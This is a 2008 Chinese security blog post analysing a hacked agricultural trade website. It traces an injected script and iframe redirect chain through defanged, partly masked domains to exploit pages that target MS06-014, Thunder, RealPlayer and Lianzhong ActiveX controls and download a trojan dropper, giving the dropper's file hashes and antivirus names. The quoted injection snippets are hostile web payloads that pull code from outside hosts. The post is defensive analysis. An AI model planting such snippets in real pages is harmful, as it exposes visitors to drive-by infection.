某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
endurer 原创
2008-09-29 第1版
发现了挺久了,不过现在才有时间来分析一下。
该网页面发现代码:
/---
<script language="javascript" type="text/javascript" src="hxxp://a*lim*o*ma*.com/header_bg.gif"></script>
---/
#1 hxxp://a*lim*o*ma*.com/header_bg.gif 包含代码:
/---
document.write("<iframe src=hxxp://www.*eq**w0**06.cn/zzll/1.htm width=50 height=0 border=0></iframe>");}
---/
#1.1 hxxp://www.*eq**w0**06.cn/zzll/1.htm 包含代码:
/---
<Iframe src="hxxp://max**-**7*.cn/a154/fxx.htm" width=100 height=0></Iframe>
---/
#1.1.1 hxxp://max**-**7*.cn/a154/fxx.htm
会引用如下网页:
#1.1.1.1 hxxp://max**-**7*.cn/a154/fx.htm
检查用户浏览器类型,如果是MSIE,则输出代码:
/---
<iFrame src=ilink.html width=100 height=0></iframe>
---/
否则输出:
/---
<iframe src=flink.html width=100 height=0></iframe>
---/
#1.1.1.1.1 hxxp://max**-**7*.cn/a154/ilink.html
检查flash插件版本,并相应的下载:i115.swf、i45.swf、i16.swf、i64.swf、i28.swf、i47.swf。
#1.1.1.1.2 hxxp://max**-**7*.cn/a154/flink.html
检查flash插件版本,并相应的下载:f115.swf、f64.swf、f47.swf、f45.swf、f28.swf、f16.swf。
#1.1.1.2 hxxp://max**-**7*.cn/a154/ss.html
/---
文件不存在
---/
#1.1.1.3 hxxp://max**-**7*.cn/a154/ms06014.htm
利用ms06-014漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
文件说明符 : E:/test/a154.css
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-25 12:6:20
修改时间 : 2008-9-25 12:11:48
大小 : 12113 字节 11.849 KB
MD5 : be60b3827121531748a25cf644e8668b
SHA1: A5FF6B8DECA69227CB6F70D7FEE2E7D111DF6365
CRC32: 8fbfd7c7
卡巴斯基报为:Trojan-Dropper.Win32.Agent.xdu,瑞星报为:Trojan.DL.Win32.Mnless.bes
#1.1.1.4 hxxp://max**-**7*.cn/a154/GLWORLD.html
利用联众世界(clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
#1.1.1.5 hxxp://max**-**7*.cn/a154/sina.htm
/---
文件不存在
---/
#1.1.1.6 hxxp://max**-**7*.cn/a154/UU.htm
/---
文件不存在
---/
#1.1.1.7 hxxp://max**-**7*.cn/a154/Thunder.html
利用迅雷(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
#1.1.1.8 hxxp://max**-**7*.cn/a154/real.htm
利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
不攻击IE7
#1.1.1.9 hxxp://max**-**7*.cn/a154/Real.html
利用RealPlayer(clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu相关推荐
- 解决病毒Trojan.DL.Small.azt、Trojan.DL.QQHelper.dsb、Dropper.Agent.bba等
endurer 原创 2006-05-20 第1版 昨天有位同事电脑上不了网,让偶帮忙. 那台电脑的网络连接显示已接上,但网关PING不通,无法浏览网页. 重启电脑到带网络连接的安全模式下,可以正常浏 ...
- ARP挂马***--嗅探欺骗的最恐怖方式
ARP挂马***--嗅探欺骗的最恐怖方式 局域网内"交换型"网络环境中的嗅探***,利用的是ARP欺骗的原理,它是点对点地发生在3台主机(网关.欺骗主机与被欺骗主机)之间的. 然而 ...
- 某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等
某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等 该网网页包含代码: /--- <iframe. src=hxxp://ruan*jian2008.*k**k*i.cn/ ...
- 校内网黑客入侵案的最新消息,用户日志模块遭挂马“QQ千里眼”
遭到篡改的用户日志页面截图 6月15日消息,千橡公司旗下的SNS社交网站"校内网"近日遭到黑客挂马,许多用户的日志遭篡改并添加不明连接,校内网方面今日向网易科技证实了这一情况. 据 ...
- 网马的反挂马检测及精确投放(免杀)
前天shadow在群里提到或许可以采取一些方法来实现对挂马检测系统的绕过,遂与其深入探讨了下,事后又考虑到网马的精确投放,总结了一些点做了点儿技术实现 ,并在这里简单记录下想到的一些想法,欢迎其他大牛 ...
- “大连天健网”“中国石油大学”等网站被挂马
据瑞星"云安全"系统统计, 5月25日共有1,220,978人次的网民遭到网页挂马攻击,瑞星共截获了318,815个挂马网址. 当日被挂马网站Top5: 1."吉他中国新 ...
- metasploit利用IE漏洞XSS挂马拿内网主机
http://www.2cto.com/Article/201407/315176.html metasploit内网渗透方面好多方式,这只是科普下xss在内网中的利用. 用到的工具:beEF+msf ...
- “假冒hao123”“北大青鸟”被黑 钓鱼挂马两不误
据瑞星"云安全"系统统计,4月27日,"ha0123网址之家"."北大青鸟"."戴尔常州授权体验中心"等网站被黑客挂马, ...
- 周杰伦等名人网站频被挂马 粉丝上网需警惕
据瑞星"云安全"系统监测,4月28日,"周杰伦中文网"."中国保险网"."玉林百科"等网站被黑客挂马,用户浏览这些网站后 ...
最新文章
- 在 App Store 三年學到的 13 件事(下)
- restful url 设计规范_RESTful API接口设计规范
- etrace 跟踪程序函数动态执行流程
- 致远OA如何实施才可行
- oss图片数据转图片二进制数据_图片数据不够快来试试这些数据增强
- 回调函数自定义传参_10分钟教你手写8个常用的自定义hooks
- 550 5.7.1 Client does not have permissions to send as this sender
- node 获取mysql数据类型,node连接mysql获取数据
- gamma分布_RAW和Gamma
- [转载] Python之Numpy模块中的方法详解
- react里执行shouldComponentUpdate时返回false的后果
- 【转】c语言位域操作—_结构体内冒号:的使用
- 中国燕麦片市场销售现状与十四五发展趋势分析报告2022年版
- kotlin使用gson解析json
- DC-1详解(绝对的详细!)
- visual basic与python_学visual basic还是 python?
- c /c++语法之extern关键字
- 词向量与词向量拼接_如何拥抱 embedding ?从词向量到句向量的技术详解-阿里云开发者社区...
- (二)51单片机基础——LED
- 2020 零基础 Vue综合应用 教开发音乐播放器—悦听(激发编程乐趣)【整理+源码】